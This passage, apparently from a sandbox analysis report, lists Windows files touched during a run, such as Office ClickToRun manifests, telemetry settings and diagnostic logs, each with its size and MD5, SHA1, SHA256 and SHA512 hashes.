5c841642a982c4479a64d1a7ee9fdd0fa93218b365e5a67debc36146c0327ef8

SHA512
089480b0df9acaaf36d9c08e5bd0756f9ca020208e6c9e2fc5841410ec36bfd9f044ce73b800f6cd7eca607804b96a78498d31bd867e4f2efb812075a2437b72

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\AirSpace.Etw.man

Filesize
412KB

MD5
dff25b5b37f0699a320e14979ece1119

SHA1
a42995cb756c2f2ba5b5586ea2fe6d94cc10f064

SHA256
7b61757e52433b58ff34d6587a6d10b8fec011a5c6e042ee318901999865532f

SHA512
ee8cf8e9423f99288bf07944f3fb66daff63c698b005021aee3830847da98f4843bfe6446f7d4135855e5fcaa4f6e0f82d07bd0219a1a7dd3c5220385d945a5b

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml

Filesize
16KB

MD5
3fd0a83745b0bc5453067ded902b6660

SHA1
072bdc9e77e5b8659e70d2950d1db8d6fa0e3a40

SHA256
9425b4ace0b6bf471d5c91a47e4e127fbf57dc4655f4c9de1183ac854a7380a6

SHA512
de42b3fac93eb8498fe1b47d8d83f9706b93914e0ecf5cbf83e7a0cfd6ea7ac47bcdfaacfdcfd84c17e2513dd6a9b47c960085cb261095969cff851c09dfa25c

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml

Filesize
150KB

MD5
984dd303bfed535a99cc3f3d904bdb4c

SHA1
41397243a247066016394c30d3b33b7ad91a9127

SHA256
13d0387e5852a97f2f97b2b5298bd2eca64f16f3cadc295a89201cc804d2a3c1

SHA512
b8e6bef76dd455bfc6fb52b94792c6870cd4a9dd34870134d13f6a131e3872bd4e50aa3c94a0882a6438238fd94039380048ba68653b10fd2c779cbb2411b692

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml

Filesize
1KB

MD5
7ebf45e3bdc5c0c3008ced70837eb081

SHA1
1b30264640d30576221991597c77f23a919ea380

SHA256
89d93c6b33c020914064fbfdfec5388fe38b3a24941579818b32917b97cd44c8

SHA512
7e74d88b099cf3909261a54be555fa02f59f07be320f47097f0eb53b50cc37fde31210ccc39dfc3bb9c5bcc1b8a0c61ed3bdafe8fb154d6f9602411f387c91cf

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml

Filesize
2KB

MD5
458ce33e905f29b629ba7a509c0d07b4

SHA1
c15bd85dd317bc4aa9abf3ff0e3b8efd1650fa3b

SHA256
e7c8ab363555cb3000d2f9422b496ed114748f188a9ad01bda19664d893115d5

SHA512
bd8ef7f7ceb3212498ee09ba278cef039214b4c2de8335831b9e3e599a310fec1656157d51914a70eee432d3bcd15a84de02ab3054e2d43bd7c432ab6f6bf603

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml

Filesize
98KB

MD5
4fcbea35246a8b351a32745f09e06c0a

SHA1
d17972b4d5ac15a51eea9e6e0989ebffcbfcaa14

SHA256
b404db7974391ee7fb74b87d98347eb3f987e59b10a5984d94ed9353bc14db02

SHA512
9eb6c29eb8eda21a4bbfcbfe6ffe5271983065160e967cbd2fa39de41d63284895939713c8c71bff57256dd9d2be93e02b9d072a06ede3a2f1836f444a98fcd4

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml

Filesize
31KB

MD5
0874a05a12799247f7b9b79b237b6fc5

SHA1
7af959b82da52df5a13a0adc92e1d4d9376dae5c

SHA256
2641e9aaab6860c8485ad0fc387f83f23e8cb6dfa7bbe02f64d53d651e401b66

SHA512
018fe5811331186fd1949a931257b43af07b10280ab01aacc39df8160d2f8418492e13a8ba7c0e88d880d446d652e96c0c8940da0313d96c235daa447e8819e8

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml

Filesize
109KB

MD5
9c7868c4f822bbceeaf181815734c4b8

SHA1
dabe8305e4db9f569ff44a89e5f33db6f0d97fd0

SHA256
de1ecc97781f4d0a6199bb403b89a1943c5b00f18efd79ddd0aae0ecb16c45d3

SHA512
48f6df74109f73465b318410a25cc127a7227495bd9a99fc3e4299f527f7780bb1b1d46964140e984fb2114d9426a82ea360fa2183b25c2d7a7486e9e0cf408c

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.PowerView.PowerView.x-none.msi.16.x-none.xml

Filesize
14KB

MD5
ebd0a7216092c609f12990e78a16e1e9

SHA1
c20f8f974df2e1ed90af93ff6ff15ff165ab0f8c

SHA256
d481e87c6252d104a47e2fb9564c5535fbcdd8becba0c19d8ee5f51a1df32221

SHA512
67d5e977c34c10f4a269c6ccbb2a4cd1e072b266db203d55c44676ae7c6f7902664b896219a88404cd0425af02c16d9555040f7fd8fe7c34d8c04fb71459dcf0

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Proof.Culture.msi.16.en-us.xml

Filesize
25KB

MD5
17607a03a47deecfc4f05a5b445f7405

SHA1
07ac463caba07346592599bb9b3ddcba8db197be

SHA256
a2b4960c4e1eae2b9ada29ca8c75942f4422e78fafde610954d301d90e7dfed7

SHA512
1ac27e7e89100d8c40881e8a2f86138d0d0da8ee026e0f75ecf574c53ab9d3239c8a3c443167b88a21d8a5ebb885ab083c959be41b93e059271625f659d995c8

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Proof.Culture.msi.16.es-es.xml

Filesize
24KB

MD5
a7870aa54bb1e97b4e0468359375288c

SHA1
dc3c0b2d698d1b34d2f723183ee029d744a77a7e

SHA256
ba207ac499a01cbd2b1d2863bb247b8a0df9f05c28d23408fad1c92b3436aa7d

SHA512
85d43c3b7648215138d8ab848c33a8e3f297f17b3579fd283f2f51576c4e06ab0cbf7cf78ad1420f52716d25daa9d6e1c49adf24201d922304fbd47755d95750

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Proof.Culture.msi.16.fr-fr.xml

Filesize
24KB

MD5
6a7a4896fda9f8f73dc1fac3acf169d9

SHA1
b135f58af6892fab4c4104a503871cb67d9b2a56

SHA256
65cd4920a667de8b1dcf5863203435bb4174557fda28e2392100cd98d4f55c81

SHA512
9ca020d421feb7f2dd7fb9b70de1d74d231d0fea6d75814333152688b49b7d0c324dd5d80ba5f5dd74836bb018a66dbf08317581f777dce20a9f5acf60300b43

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Word.Word.x-none.msi.16.x-none.xml

Filesize
93KB

MD5
af721e445daae01751ca497ba30b4383

SHA1
6d44a3d6e2796a3a31edbfa46b0926b9a9d0868f

SHA256
81d9c91805b1029b458186857573a3aad9d76d0f79792f932b2fc88b9548885e

SHA512
07b72250ed690be59d7c62182ba95b1f48793c41de5ab144a4f88ed5b5972f23bbab444c413eff7e75bd7cb59698f45dd816563186446903bd72e96f0d0d8ad2

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.dcfmui.msi.16.en-us.xml

Filesize
9KB

MD5
8961ed29c16bd4fbf6e957233e389d78

SHA1
c64670428af5a48a35730ab33ff699ade8e4119b

SHA256
3c6c886312cb4fd96217b15691a3d8493a1c2a25a003732d71d5f82f7460891a

SHA512
50db7bb713959cd799e0cfb2740d6149ffb8dfab12e712649d45811f341fcd9d291ecfda49505e7b575cbfee1e86e37f8374ba2e15cbdd33ede7d78c0e7f4eb2

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.excelmui.msi.16.en-us.xml

Filesize
39KB

MD5
12b79aa90e35ad3f0ff245b86db4865b

SHA1
4295dcc540812a561b74a636140ea97af28ac6c0

SHA256
30dcd101446654fd0faf616daa45457493eefc2f49fa90970605764ed6776e13

SHA512
24c70c6eb7554c9a7e49c98baa5f612666e3e00f6b3218b51f71baf1db2716335c6f69eb023cdffae2154cb0e3a550fbc92f1b60bbb84dde50990640b60e96e9

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.office32mui.msi.16.en-us.xml

Filesize
16KB

MD5
9234114aa09d30a140364dd0f8eb59b2

SHA1
16151d02843e33162669ab523c29b8e6a8626017

SHA256
077729f43a0eea3f65932118898077a77d6423cf1074d3c41496553d5715655d

SHA512
2be85cccd87feda5bd89b27ede5311d2f12f38f7a044b3d94eb3763c378d1fcbb5c5d140557392ea094d6396a043252b6fa7bb5a9a406d8b7119ece6886f5420

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.office32ww.msi.16.x-none.xml

Filesize
331KB

MD5
c889afcddf6cc736c9461c9ddca83910

SHA1
1a1f378f5ccb047a69e23d17b43ca41121498ad9

SHA256
f79273fb9bd4c71ef2b941d42d749806bee3b0176a2e6cd7734c7f83c4b6544f

SHA512
ff0ba16185e42eee0d38f22c5d8e4e5dceb394b209ced9a2235700c0fe5d981313d2a780650d843908a1ba1209522a548a7c58215c738d050828d399db1a87e0

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.officemui.msi.16.en-us.xml

Filesize
122KB

MD5
c1906c569d35a434f314cbee664ad9dd

SHA1
b5564ad733eca52741cd34df8f30708b731bbcb3

SHA256
804b6cbe332099f6eccb0fca91ab95c7bdc697787ea2ffdba14737a8ce43dfcd

SHA512
c1577e910d76403967a17c7776e32067f4bd14a147921de4140620ece283faa8d51963f35badc1e4939c820fc71344b104f3caec480c5f87f018cdee8ca6a17d

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.officemuiset.msi.16.en-us.xml

Filesize
2KB

MD5
41d10f4012a19a9c71a89e8fc0bdc812

SHA1
dcddd2ffd161595d6372cbb834c2daad5b5979ba

SHA256
f93cba690350962179e28bb5e0e8f4fd0e43e9bc0eb52e00392b3fce15075899

SHA512
d3d1df52c84691a440e73923b476b72aec1bf4ea921728a5c03dfaeb8471abacf0e04a99ef13e8089a671a25d55ce2becf782244e9a9dc08d5f27a7bdf843adb

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.onenotemui.msi.16.en-us.xml

Filesize
18KB

MD5
0173ea3333b450ec298a0d628c43524b

SHA1
1046200972fed17a3ef3ef093da1d3e8d7529004

SHA256
9bae1fad8ea840d8650b0d98a8964f1335bae2ce6316c342779ad2355eb0a01d

SHA512
522029a9d64c3a2e5b9e9fd05548fcb23139952751fd24b61ac19ccba3ea338622f64666ed0319edce3de05c4258152d7d0445642d2c7dcf551b08a4e2fa2bf4

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.osmmui.msi.16.en-us.xml

Filesize
11KB

MD5
602a64262a40ad42a1ec4b360bf94404

SHA1
90b4bdfecc7e8f3d23748416c9efb6a4aa039788

SHA256
2ed9594f0512d4fe3f4e2520ce350bff4522ed31b21c9f9ccd8669829aa275c9

SHA512
fbd6d9ca26318cd52e00b619313e560e19cdb05dbdadbd0472d8d36dee081fd7a90ca93fccea461dc6d4e48e71234a6a7011f6452094cc595b62b2c06ef2d7d2

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.osmuxmui.msi.16.en-us.xml

Filesize
11KB

MD5
9119febd78053621d847bdd67a68217a

SHA1
eb230104c30586fe02d7620bafebdfe3b5dd2aea

SHA256
655f0d56463f492829b82e20f19fa35fa649d252346d0549b01de8e4a6a66bf3

SHA512
8942831af62147113dcc6034f03686d28842c2f726e16ff122ceef6d0d6da59c876eadefeaf69d851a031fb96c06fafbfc8566804ac120ab30a279cec8ad8a00

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.powerpointmui.msi.16.en-us.xml

Filesize
27KB

MD5
3315aeb83efe36cab99eec454e89235a

SHA1
7167a86a4b1b2a4518c3c99c797798bb2a57a30f

SHA256
570dd7b3690d54136a58787282f1cc47f53992b9f8a5ef9d3dfddcda38474365

SHA512
463d36dc84527d0178406e4a8e4c936bcb8aa2cfbe31901eeaea2f254a33800dcf20110724cbee2a39cca77936a32cfde77c9db62b651eb7547cc0d2edc9fc9c

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.proofing.msi.16.en-us.xml

Filesize
2KB

MD5
c907bd175ff9cfc3ec153f92e44da8c7

SHA1
7e73ebb72e78f0c1f12006b5201552f033645d9a

SHA256
bb7c88e1391bf1221f6b0a22d5db8f1e71823dbcb2a987726dde4fd72cdc7f81

SHA512
771a7ec889deedbe003de5e73364af8d3def02ca783bbd34d983c1db161cac3875509c84446845c59a4748c00f4f96a9d0a40e2005773aa2666159926924b5f1

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.shared.Office.x-none.msi.16.x-none.xml

Filesize
719KB

MD5
f10265046e58e6fb253675b3295ccc70

SHA1
974549b15f4ae8a761956e0452cdbdb7855fe5c4

SHA256
4f17aecae4fc2d9ac9190133b72afb85e6c8b0b7bea3237c9008a8110eb4b4c0

SHA512
fcb015b33e1ad0aa43b63cdfa9325af6098ad66c281b15d6f2a756663e287819ecd1634e80be4da82f20f1b153c83e60cbac1d111cf928400189d9dc15831fda

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.wordmui.msi.16.en-us.xml

Filesize
77KB

MD5
05dea6af7fd79d263a71ee15c186a554

SHA1
9f476a0d7ea7eb336eac214080193b224328c253

SHA256
1a5499930085a4a50182f0f47004d5bea94f8e5150af737a551850ccc5b96084

SHA512
488cba9b9f17d4ac1e3966fcae125a9b786730cffdda12d6b08e424aba5bd16171ec2f87169d7e24ed53783e04242c95801d7ae57abd56ff6017042345b6199f

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\Microsoft_Office_Office Feature Updates Logon.xml

Filesize
4KB

MD5
7c7ac783cecabe3f818d2e4ed703eb0d

SHA1
5165f7e7bea33f23a7b9ba712ecbeabead1ae58e

SHA256
99bde922199a3f49bac218d585714ae3a0e60f9711005ef23328db384975269c

SHA512
0f1dae810ce531c2c521f961a57b647ffe153d4ad9b62effdda0bed02fc3f3bb856e84de355d185261461c7807acb0b72f0cbc61b1982c50491972fb2448e15d

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\Microsoft_Office_Office Feature Updates.xml

Filesize
6KB

MD5
1f44d6188e38372fbcced7fd47875186

SHA1
c6b65732b6f9e6eb3e683ecae39976a469bb3b94

SHA256
3808eba61b8a83433c5f47a6d893dc0276624f2c72364c15cc306146975b4c06

SHA512
04bdaf3a8e7903938b3d9e26c2de8c5ac6b06833c68c30b9467a511638815e42f506cea1f1ebd5bf9982f00acd1e3a69b63bc130f7c012f5f902318190a80d96

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml

Filesize
3KB

MD5
6a6b4f3cc2b639f11de9858233b19407

SHA1
157a7c720fb55bfbd5eea7ea05ba6e95b9b590f3

SHA256
edb34a1137cc9075a9c55757c4b6d6f7c35887b647b97c1519ce158ce4ffc8af

SHA512
4b9e896101953b3a2ee22587d2b62343c0a9fbcd115505051933aaba7a09b526de829dfea8ca2447d1fe258982bb0d901bf5bf6193c4b0229ec5ecfdca5d927f

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml

Filesize
3KB

MD5
8b46c48c7f7fb8d7af128d622a9732fc

SHA1
ad7f0bbb0ceda9f9aff1f0f25b103371b7560bbd

SHA256
4b33e29d2081933dbe5535e67d6ad80e0dfb41136864c73773fbc5c360bfddc0

SHA512
0b1b33437371c63f57c565a9c293d03a01f7c51e5c864084f3377aa161e80d2a2a7b114745f3069a0c5e62c1ab4197d90fd07f499484b963ab626bd289034a3e

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\msoutilstat.etw.man

Filesize
111KB

MD5
847eb0c3da21ed6a8b17ef132a2c1daa

SHA1
6b34bfdfa71416241a88626d1c3c5f9b8150e7f4

SHA256
10f4cd6b5c78d5474fe028f307e6800753d015caa1756e0f1cac12617ce3d0a8

SHA512
723b4f002e8fec2bb18999174f3084f586ebfbc980852bd8ff0a306cf34b4d037560fe08637a79406762be32eb0fe77dc99d55b3c938697b827000221019c30f

Download Submit
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\wordEtw.man

Filesize
1.1MB

MD5
160fd9e7323628bef119b7e03b97642a

SHA1
8ef598ad1f00a8f9810c2862e291af5deb0acadf

SHA256
dd70e33747cc6388dd7749beb2b56db8aee7b2a37690fcb3fb034ede66e9f0f6

SHA512
6028460864e7d6c3663de1d57f863224963043a02ca48826a595872d9cf667e5220a8074f0a7341d6e05a168ae9a92ee583db3c5185bf9147cb0fe252eddf7a1

Download Submit
C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\08e575673cce10c72090304839888e02_4304acb9-c3f6-452a-9860-eb4e85d38d4e

Filesize
338B

MD5
2138db89d871c32191492df09125644e

SHA1
0d039a37ce0b9a8434df289577484c8a0e21a802

SHA256
61faa9724b52e45540ae9dbe1ad2214ad1dde7f2fcb1d9e27b49917899b4221a

SHA512
6e251860aa7521b0a91478e7b422adc728158bb267d68c1b03b330f005254e30be2edbe2db0b85b1eaaf7c0f5a6231454ff620a3b164ddc4ce41b16e88e326d7

Download Submit
C:\ProgramData\Microsoft\Crypto\SystemKeys\48449945373511794b3f6f1e25725545_4304acb9-c3f6-452a-9860-eb4e85d38d4e

Filesize
1KB

MD5
27ceab62a5114d6fbe3c4a9464f18884

SHA1
7b6a8014c65abde8eb15442db4fe1ed2b5775ef8

SHA256
5444050ede47e7940f16b5bea1d52c76c8098381ae7f61a4f676574cb253dcde

SHA512
bcc6d343887bab91bc30fa5cd5f44f1b40c5319dc1340eacfa1580fb038bf80be1c6f6669103cdb6b90d8ac09bd52b9e9662ede06ce24359b93171a99779b6bd

Download Submit
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.P-ARIA-4bb4d6f7cafc4e9292f972dca2dcde42-bd019ee8-e59c-4b0f-a02c-84e72157a3ef-7485.json

Filesize
402B

MD5
f7e232d8424ee7f4237ac0596944a893

SHA1
53a98c2d6c887f91a844dd2803a8003006aaa2d4

SHA256
c0d73cda4c835cbe6030d9bd2323f45bf839976b3f5771af8a44b0f8465ffbb1

SHA512
6abeaa3316629622e4862027d8a0e345fa4ff5a92fa102e009aa9a873dfc103bf4563697a8567a0916c6d691517642e35f7cdb61b34f9df4332a6ced57da1134

Download Submit
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.P-ARIA-af397ef28e484961ba48646a5d38cf54-77418283-d6f6-4a90-b0c8-37e0f5e7b087-7425.json

Filesize
402B

MD5
8105ab18245a25cdcdc90e7fb672417c

SHA1
1861072d78be64e24150f764ccc1da2b16facf51

SHA256
58909ed1314d7b8a146d96ba74c672d85819c27b7c60346db54f4c85c4ccaecf

SHA512
c825936beefc5b0204ebe0f19c8d5ac96de816b2a42b008748a51ab54970554af3986e2b2955d09d6d537bb99f7d62e82abddabdf1cd4737edb49b6bc8e25e1c

Download Submit
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.P-ARIA-d5a8f02229be41efb047bd8f883ba799-59258264-451c-4459-8c09-75d7d721219a-7112.json

Filesize
402B

MD5
74ec745e763abf4f8533f110a31ed0a7

SHA1
c76520b93e7d36abe9bdb5af5ee5430ef525a594

SHA256
d8f8819dba015fec6dec3dd5a76c10fdb31e3aef31189a5a728d0c5421335e6e

SHA512
5a96d39eb7ac84659dc6c9b45d561099d854eef52108eafc213b0d3e69b2d6fd4ca7e619d5d4a0e81f6ad6d370b90266ca9d2b33f13d3e1152c1685a6a97ecfe

Download Submit
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.P-Eco3PTelDefault.json

Filesize
338B

MD5
cdea844fb85aa6b4e384ce0eb3a2d98f

SHA1
05aafad9ea77248ae9c65306af38413ad299458d

SHA256
bdb4f807bf2e2fe9f425c672076dbcb3d554ed6e87e6f8200b470b68a3c0a88c

SHA512
916f571499f43dfceb2b52fd57d23bd86306c058b3925bc9f3ecea7e0f451e433e6516185ef7511050c52cd5bb4e091e3fd801bfb2cfb31e43f7a43b4459b6a8

Download Submit
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.allow.json

Filesize
2.2MB

MD5
a5c21d1b4ee68205e7ae1685d56c417a

SHA1
89996b031035c7768d649e5ea23cdbd9d8e3ed32

SHA256
90a8c65a62ddd6ae06181d02cb28b9b9d1311a0691702b3b1917f49b83fe13a3

SHA512
4a3c583bcffc134713057c88e98b1a4f6d05104ad3a8cb918618f19d7a059d24fcb61626493d32d04c9ac7802d602cf034a056603aedef545cdde5f0a987bb8f

Download Submit
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.app.json

Filesize
126KB

MD5
c40c618021fe18579d73d97069550ebe

SHA1
81e1c9c2c01babe476a3423809cb5785382fae1b

SHA256
3685ef188ae7c3da193044281e1d58973ccabbc8f1014003fc340f08c67ee80c

SHA512
97e6da07780fa59003bf89faa5a79d317503668218e2361b1553aa97b8510da2a720c24dfd99e7c54d4fe64de65fb6eb0004952b881468738802964a06bbcd89

Download Submit
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.app.json.bk

Filesize
4KB

MD5
ec2c46215d2ccd7ee2e9660cb0613321

SHA1
8bcc45011143c681c4ce6250f3381f6acbe2efd8

SHA256
309e24ef5810d580b16d99060dfcb72926ef1a286ee63f4e14ca4f7ffe33c463

SHA512
f5a6e5c5bfa530ec40ad44e5acf1e7f74f3ac03f6c51976c86b7d317f0a706414d30a9f404a18da5dd2cbdf44537fb7359fa8135bcbf1207e5e19b262864e463

Download Submit
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json

Filesize
2KB

MD5
0da5e429753281f103d2816e205fe3cb

SHA1
0db3a05013b7f34e2bb38c77ec534ee22df3c22a

SHA256
359ca880cda94bb0e034bd536f0ef77dfb3b1c6b108e54af65aa6bad1e316b42

SHA512
632fb0d0f8414adadbd695039b4415701ab944a027e43a2228606d7587a00e9a60b66b5da3231c013c4b423f00007e262b0a1e776807efd236616da82d9a5683

Download Submit
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.privacy.json

Filesize
2.4MB

MD5
6c5d8dd64b016f852a3106c8b065a3d0

SHA1
d51abe6c536ba23f52554dca6877d3fedbe17690

SHA256
987111bfb0ed82e1676f342cafb5330067c3af18397105336a0e624e398e0efe

SHA512
1ac25daeb12e179f5909ea593b48ad4aa370f7921db905e91336a10b525720674f886c98f9b98e01e0bbbeb6b61fb9036a5ccf79ba0e7f392ad3ff80ec0d1a4a

Download Submit
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json

Filesize
322B

MD5
dfbda14062e2c7924c14c8e4831a4a13

SHA1
d05f7ffbd60b67c6bcf9435a87b08c4bf5cb9f8a

SHA256
d31b8579e793ed2b54717be378cbed3b07e7e32fd2324d8393f04bd83c5358ab

SHA512
d1d3de31b0bda1259aed3d49da8591ca4ea2982b9d2161e7a24c95cc87e1d1bcc9c085db80a611ad79fdabddd285f8019dc6fa7222a9a4f2be582b166b5efac5

Download Submit
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json.bk

Filesize
306B

MD5
801e3aa25d1f86a2324428300d273999

SHA1
862006009cbf14ce8bbcf39eb963e78dbed4bc43

SHA256
f592b294cb55dc25a7e8c5dd036491291dcd68f7e66f49db3fca2f7235bf5f77

SHA512
703026520c8248fd1f4329000fc9d1cab182b8298097305e2dbe338e105ed649fbae47856c194f7bf68e4f86cf8df2989bc6696e5d39efb8bc9b2aaade7e23b9

Download Submit
C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\Diagtrack-Listener.etl

Filesize
192KB

MD5
9510988a7321d5d585016a10e8366a7e

SHA1
e1875353c85df5cdb0297ac1fc00986b0fe9ee7e

SHA256
567106685414d9637670fd95b7d15e618a4b82df7aefd13a89dd0c329bded3e6

SHA512
8e9a383ac1a119d0bd18222668af6b92aad06c4957622b0a091d7d7d1d265bd3cf462c3e3baeef25bb33c82f6398e9caebfce378ced2e3fe4a88310946025d41

Download Submit
C:\ProgramData\Microsoft\Diagnosis\EventStore.db

Filesize
64KB

MD5
059993e50250e5d2f68ebe6cfd6abc63

SHA1
eacf1f32614e752287d3dd6bfb41e60ba7d6c587

SHA256
90553f4a8b28fc659028fc333d3034048c25e46d0d74ccfcee1cab9390cf92b2

SHA512
d096f8064bc35aea759e2de15bf24e7a93d64a374b5360dce8cad5867327983fccd9e439b749ede0c98b15cc72b03f8a8b86c6026dc14a0d786ea2955f438285

Download Submit
C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db

Filesize
32KB

MD5
d1c10ba66c381259f5352c8273b092c2

SHA1
f7d2cce60f6deeb19d47e653a313499d51c260f6

SHA256
f66f2415d8eab65ae2255900cec858e53967d3fdd1e17ab9b40558dfcb29910f

SHA512
e505e9acdf0a37bcabb4d1fc24cd58754b4862f55c10dae526b79812e03143b985696e4761b723e1b003b850d47fdf7fd055101c59a8cf2482505c8310e2e66c

Download Submit
C:\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db

Filesize
20KB

MD5
6f3e1b99ba39931c6bd5ed28d15f5a1b

SHA1
5f7e2d3b113f9a858f1cee245effd9ecd72af6a6

SHA256
0035651ecf32e7b722b7a19e6faaa1872dfabace0f22340365d2853f3a897277

SHA512
d6521c2bf2f842aaf1e27af440438de923f0ff457a699484b93028a09ee2441d3f96346f1530032eeff7dcd54df22cf7373e3841b8313803984d886071770956

Download Submit
C:\ProgramData\Microsoft\DiagnosticLogCSP\Collectors\DiagnosticLogCSP_Collector_DeviceProvisioning_2024_10_7_9_3_45.etl

Filesize
256KB

MD5
46df88a194e96809ad14a23d59870c6d

SHA1
24bc787b8d8531e8db11fa3b753ea8a90853bbf0

SHA256
eb271605f35212923c51482054ec700f62380b01ab559052d387a6eaa6e75d35

SHA512
120f1d473e76a4a198b88dedcc050eb5477a2a01d3f89c4c695f3aaf7936fb15362a92fe0b0c446b282d87ad7f1c46ca38902fea96c6fa369011bb767df320e8

Download Submit
C:\ProgramData\Microsoft\DiagnosticLogCSP\Collectors\DiagnosticLogCSP_Collector_DeviceProvisioning_2024_10_7_9_4_11.etl

Filesize
256KB

MD5
d05aebab022b450550531d1a990792f4

SHA1
2377b176ae7302d42cffd7ae41c175976c60928a

SHA256
585a18918b39ef653388b01fc4b20fe021ca02690eef1435e25b1638146af2d9

SHA512
e704dc49261ed4e528f6daacddbc7480df27b525d8e6d08b96f8fc3b60f0eff115f6bfdd07eaaf9063393af2e08ab9ecbfaf933d1aa5b070449b5713dca7445d

Download Submit
C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log

Filesize
64KB

MD5
fb00ba34761d646ae43c698948096faa

SHA1
4a893b9ce44fbc4cd6ee53ac22f8c210cc3826b1

SHA256
1c0f676dd6be7cc9f0b9073cad3d1192bcf71a265ba9372e7627cad373fcc616

SHA512
7c46e4f1753163529c66bb1e3e0422076bcc415ec32eedfd19bba12cacd040a6e5bdbfdd8ea74c7b4618ff2380722208dd009a780e4629403663359f2008d048

Download Submit
C:\ProgramData\Microsoft\IdentityCRL\INT\wlidsvcconfig.xml

Filesize
12KB

MD5
64afeca6d75d05d7867beeab4a2c81a6

SHA1
42ef0779a3c54196b066253e82fb8116960589e0

SHA256
e5efb91887c47ff9d3f78e64be2a844dec7f72ae1c6e317b7d815070c2645274

SHA512
4f28694d0c1d2bdfe40912ef1e826c192ba27575f9a98f0bd4c5211ca149dc0be44680c5b6bac3b431519b6b30fb308fa6303cdecd9c74d687938167a4d64cf8

Download Submit
C:\ProgramData\Microsoft\IdentityCRL\production\wlidsvcconfig.xml

Filesize
14KB

MD5
21ca08b6072fb9268ef8b51b168f8f91

SHA1
